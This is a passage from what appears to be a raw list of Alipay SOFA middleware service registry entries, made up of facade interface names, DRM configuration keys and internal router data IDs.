SOFA.DRM","com.alipay.ugstrategycenter.common.service.facade.task.OutAppTaskOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.linku.common.service.facade.tenant.TenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsnsbff:name=com.alipay.finsnsbff.label.editor.isLabelEditorShouldShowIQTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yqcore.common.service.facade.api.PrivilegeAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobatch.spi.adapter.facade.CallbackSpiFacade:1.0:discount@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlmng.biz.verify.common.interfaces.VerifyTaskManager:1.0:cddTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobileappcommon.common.service.facade.openapi.whitelist.WhiteListOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:maintainOrderApplyCloseProcess_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.crowd.CrowdRuleRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.finance.FinEntityTagRefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testresaopone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rep.component.facade.spi.EventDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:zpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.api.VersionOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.AdDeduplicationBlackListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_BANK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.241.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.allowUnitedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.label.LabelConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterConfigurationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.AuthInterfaceFieldApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.degradeNomo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.amy.service.facade.GiftReceiverServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbarcenter.common.service.facade.ar.ArMerchantSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.StdResCodeDispWritingMapQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:certify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktPageDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:widcsplatformCreateProcessTicketCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINORM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.role.facade.RoleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchservbase.biz.service.leads.facade.LeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.core.service.interest.InterestIncomeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.UserProtocolFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appxagg_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmhatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.album.api.AlbumManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.core.service.metaq.MetaqProducerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:authcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_STS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finclouduserservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.common.service.facade.order.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finaggexpbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.157.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cinspfront.biz.service.impl.mobilegw.MerchantInspectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.PostBpmsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.213.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FundTradeRzoneSwitchDrm.uid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.algoevaluator.common.service.CampJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.dispatchPlatform.IcPlatformActionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yuemaprod.common.facade.service.InterworkBoardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.DictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.MngPageRedirectStrategyDrm.subdomainSuffixes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koisemiousdemoxx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.AmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeha.sdk.core.api.HaErrorCodeConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.kvSplitStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.core.service.repository.quotation.FullSnapshotRepository:1.0:memoryCachedFullSnapshotRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.wealthscore.api.WealthScoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.SpvServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.ops.OpsContentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExRateQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.207.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:mappprod-merchantapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.paygrowth.common.service.facade.task.TaskCompleteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.channelrouter.service.facade.LdcDBWriteProxyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.DynamicCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.52.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.49.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.178.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:giftprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayutrprod.common.facade.inspect.HaPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cschannel.common.service.facade.xts.RightsExchangeTwoPhasesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.user.SecuUserVisitMentalManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.integration.creditcenter.MiniTransClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.tinyapp.TinyAppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_LINEPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemsgprod.common.service.facade.msgconfig.SystemMsgConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.235.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.withholdSkipAccountDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.attribute.RuleAttributeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifxposition@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DVLableMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.AccountAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.beike.BeikeAdmitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fePurchProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.withdraw.MpaExecuteServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamOperatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransReverseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorPromoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.fundexchange.FundExchangePhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.mybankaccount.MybankAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.contractquality.api.execute.ExecuteCaseService:1.0:execute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilegeocoding.common.service.client.DistrictProQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.42.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.188.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","gftms@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mitemcenter.common.service.facade.api.query.ItemDisplayCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficlimitcenter.service.facade.LimitRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.PushMessageService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.MerchantOnboardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:rubikstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mapi.facade.partner.PartnerSecurityFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.178.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@mrchishub#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppKeywordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.common.service.facade.taxoptimization.TaxOptimizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igdispute.common.service.facade.NegotiationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finsnsbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alipaypointcust.common.service.facade.task.service.AlipayPointTaskProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountDecisionPreConsultiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.GroupRelationCountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.core.service.query.common.CommonQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.service.facade.api.RecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.consistmanager.ConsistTaskManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.DirectPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.query.SystemConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:egg-app#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.ruleengine.service.biz.AttributeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.186.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:mobilegw-spi-adapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.certificate.CertificateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.member.facade.MemberProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:vehownerprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.spatial.service.MultiSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExRateCombinationMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.ds.meta.service.MetaService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-15#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.rest.api.StatusAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.escrowexprod.common.service.facade.NotifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.decision.workbench.channel.ChannelRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.FlowInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.MicroContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.msgview.PushMsgVerdictManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.api.InvestOpinionMarketCompassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.ForestCustomerBackendFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.debittrans.service.facade.ipaytrans.api.IpayAccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.customer.CustomerQueryManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditprerec.service.WhiteDescribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.EbppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.openapi.conf.dispatch.AntqTimeDispatchTestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitAttributeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.GrayIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.myfavor.FavorServiceQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartPayBoxDynamicCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.AliloanCusModifyCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imkteyecn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.task.service.AutoMktUserTaskFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeCategoriesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.contentsource.ContentSourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.bot.facade.cend.CEndRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityAuditAuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.gateway.api.UnifyCiProxyAdapter:1.0:walleetoe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireMockAuthFailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:wealthgoldtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.ChkGroupOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftOperationLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.proposal.MobileClientProposalManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tcc.common.service.facade.api.QueryByTagsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:baitiaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ReplaysSearchTaskItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskmng.common.service.facade.api.RiskTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ereon.biz.service.pressure.data.api.ErcInsertPressureDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.133.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.cds.event.CdsMessageDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.facade.ProdSwitchPropManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fbepservice.facade.oneid.OneIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileanti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.common.service.facade.apoint.service.AlipayPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageUserFormDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.FinancialCloudFaceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.activity.GroupActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:linepay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TAG_SECURITY_DATAACCESS_MULTI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fin.arcore.common.service.facade.rzone.ArOperateServiceRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrisk.common.service.InsRiskFacade:1.0:gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.ComplexFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:global:f#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscprod.facade.markets.HotPlateFacade:1.